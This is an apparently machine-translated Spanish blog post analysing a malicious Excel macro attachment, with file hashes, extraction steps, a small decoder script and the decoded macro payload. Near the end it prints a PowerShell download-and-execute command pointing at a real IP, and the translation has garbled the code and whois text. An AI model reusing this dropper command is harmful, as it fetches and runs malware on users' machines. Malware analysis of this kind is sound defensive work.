Introducción

Ayer recibí en la bandeja de entrada de mi empresa un correo electrónico con un archivo .xlsm adjunto llamado D92724446.xlsm procedente de Clare588@78-83-77-53.spectrumnet.bg . Los motores AV centrales y locales no encontraron nada malicioso y un análisis multimotor obtuvo como resultado 0/57. Decidí investigar un poco más a fondo para confirmar que se trataba de un archivo malicioso y extraer al menos el código que imaginaba dentro de este documento.

Información general

Esta es alguna información general recopilada:

[plano]

Nombre:

D92724446.xlsm

MD5:

fea3ab857813c0d65cd0b6b6233a834b

SHA1:

64eef048efe86fe35f673fd2d853a8a727934e6c

SHA256:

75e3a4cd45c08ff242e2927fa3b4ee80858073aade84898040bfbb7847ef

profundo

768:qEIo/BPRS5t1dbQjlshORhynxvWXLUYJdGnSCk:qIJM8jl6nIP

Tamaño del archivo:

36,1 KB (36978 bytes)

Tipo de archivo:

Hoja de cálculo XML abierta de Office

Información total del virus:

Primera presentación:

-02-18 10:35:06UTC

Última presentación:

-02-19 08:58:57UTC

Otros nombres:

93D9B24583.xlsm

e94fcc43b0dc9c7eb350149b4ebdfd3d

61a47fa44dd55f5721ebe85aa83a32e6

I233185_486.xlsm

L335966_246.xlsm

271269885.xlsm

4501B81210.xlsm

e65fb3285617c7b4bbc833a466be6c42

5312970.xlsm

9D50B4390.xlsm

DDE1368393.xlsm

E30178611.xlsm

43c29faad6fc5984273afcc67593d802

FE731885.xlsm

C47394.xlsm

sospechoso.xls

090214399.xlsm

Q884674_740.xlsm

E015272_266.xlsm

U506714_083.xlsm

43925982.xlsm

8BB4D89313.xlsm.zip

82AC485705.xlsm

8abb99eb6078b658e05aece79337378a

0BF112.xlsm

[/plano]

Análisis estático

Comencé mi análisis echando un vistazo rápido al interior:

En el desplazamiento 0 podemos ver rápidamente 4 bytes que confirman el formato del archivo (50 4B 03 04). En este punto, intenté obtener más información y ver cómo estaba compuesto este documento:

Esto confirma rápidamente mis primeras sospechas. En el desplazamiento 0x000012f1 se encuentra un archivo .bin.

Avanzando un poco más, podemos intentar conseguir el código de estas instrucciones:

Se extrajo el código y se crearon diferentes archivos para clases y módulos en OfficeMalScannerVBAPROJECT.BIN-Macros.

Al abrir estos archivos con un editor de texto simple, inmediatamente encontré muchas instrucciones confusas, como se muestra en la imagen a continuación:

Sin embargo, después de un rápido análisis me di cuenta de que los módulos realmente importantes para extraer el código malicioso eran los números 11 y 14.

Esto se debe a que el módulo número 11 contiene las instrucciones para ejecutar el código ofuscado asignado a la variable denominada «FfdsfF» y desenmascarado mediante la llamada a función «NewQkeTzIIHM».

«NewQkeTzIIHM» toma un parámetro de entrada como cadena y devuelve una cadena.

Estas son sus principales instrucciones:

El -13 inmediatamente recuerda un bucle de desofuscación que emplea el algoritmo rot13.

En este punto, simplemente escribí algunas líneas de código vbs para extraer correctamente el contenido e imprimirlo en un archivo txt llamado salida.txt.

[plano]

Función WriteFile(sText)

Establecer objFSO = CreateObject(«Scripting.FileSystemObject»)

Establecer objMyFile = objFSO.OpenTextFile( «C:UsersEOSecDesktopoutput.txt», 8, verdadero, 0)

objMiArchivo.WriteLine(sText)

objMiArchivo.close()

Función final

tenue i,x,y

x = «pzq-X-]|«r `uryy;r…r-5[r«:owrp -`†€ rz;[r ;droPyvr{ 6;Q|«{y|nqSvyr54u }GB ;FC;?A@;Dx«rsr«rsstq€rrq…‡~;w}t4942aRZ]2iWVv|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWVv|qsuv| VU;pno-2aRZ]2iWVv|qsuv|VU;r…rH-€ n -2aRZ]2iWVv|qsuv|VU;r…rH»

Para i = 1 a Len(x)

y = y + Chr(Asc(Medio(x, i, 1)) – 13)

Próximo

Escribir archivo(y)

[/plano]

Este es el código claro obtenido:

[plano]

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg’,’%TEMP%JIOiodfhioIH.cab’); expanda %TEMP%JIOiodfhioIH.cab %TEMP%JIOiodfhioIH.exe; inicie %TEMP%JIOiodfhioIH.exe;

[/plano]

Y este el whois de la IP remota:

¡Conviértete en un ingeniero inverso certificado!

Obtenga capacitación práctica en vivo sobre análisis de malware desde cualquier lugar y conviértase en un analista certificado de ingeniería inversa. Comienza a aprender

inetnum 5.196.243.0 – 5.196.243.7nombre de red Just_Hostingpaís es decirdescr Sólo alojamientoadministrador-c OTC9-MADUROtecnología-c OTC9-RIPEestado PA ASIGNADOmnt-por OVH-MNTfuente MADURO # Filtrado

Se descarga un archivo llamado dxzq.jpg . En realidad, es un archivo CAB ( JIOiodfhioIH.cab) que luego se expande a JIOiodfhioIH.exe y se ejecuta.